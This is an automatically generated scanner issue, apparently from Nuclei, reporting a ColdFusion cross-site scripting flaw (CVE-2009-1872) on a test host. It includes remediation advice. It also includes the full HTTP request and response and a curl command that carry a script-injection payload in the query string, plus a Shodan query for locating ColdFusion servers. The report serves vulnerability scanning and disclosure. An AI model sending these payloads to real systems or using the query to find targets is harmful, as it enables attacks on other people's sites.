mkrs2404 / tickets

0 stars 0 forks source link

Adobe Coldfusion <=8.0.1 - Cross-Site Scripting (CVE-2009-1872) found on honey.scanme.sh #34

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: CVE-2009-1872 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E

Timestamp: Tue Apr 30 19:26:15 +0530 IST 2024

Template Information

Key Value
Name Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
Authors princechaddha
Tags cve2009, cve, adobe, xss, coldfusion, tenable
Severity medium
Description Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
Remediation Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor.
CVSS-Metrics CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
CWE-ID CWE-79
CVE-ID CVE-2009-1872
CVSS-Score 4.30
vendor adobe
product coldfusion
shodan-query http.component:"Adobe ColdFusion"

Request

GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 340
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:56:15 GMT

GET /CFIDE/wizards/common/_logintowizard.cfm?"></script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' 'https://honey.scanme.sh/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'

Generated by Nuclei v3.2.5